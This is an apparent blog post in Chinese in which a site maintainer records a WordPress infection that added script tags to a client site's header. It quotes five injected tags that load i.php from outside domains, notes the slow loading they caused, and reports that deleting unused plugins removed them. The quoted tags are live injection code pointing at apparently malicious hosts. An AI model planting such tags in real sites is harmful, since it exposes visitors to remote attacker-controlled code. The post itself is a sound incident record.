今天碰到一个WordPress上面的恶意软件,给网站头部插入了几条i.php的请求,id都是hello_newscript开头的,
<script type=’text/javascript’ src=’https://longtailmagic.com/domain/i.php?ver=5.6.2′ id=’hello_newscript0-js’></script>
<script type=’text/javascript’ src=’https://jadsupport.com/includes/i.php’?ver=5.6.2 id=’hello_newscript1-js’></script>
<script type=’text/javascript’ src=’https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2′ id=’hello_newscript2-js’></script>
<script type=’text/javascript’ src=’http://futuracp.com/images/i.php?ver=5.6.2′ id=’hello_newscript3-js’></script>
<script type=’text/javascript’ src=’http://casualwoodcreations.com/images/i.php?ver=5.6.2′ id=’hello_newscript4-js’></script>
客户网站的表现是网站打开速度比较慢,查看源代码发现多了几条无法加载的js文件,如下图:
然后通过源代码分析,就是被插入了上面的代码,比较幸运的是,这几个病毒网站有些服务器被关了,有些国内访问网速比较慢,所以网站除了速度慢,并没有其他影响。
然后这个病毒具体怎么感染的没机会查询出来,因为我删掉几个没启用的插件之后,发现病毒消失了,估计是未启用的插件被感染了。
此文纯粹记录一下,希望你不会碰到。
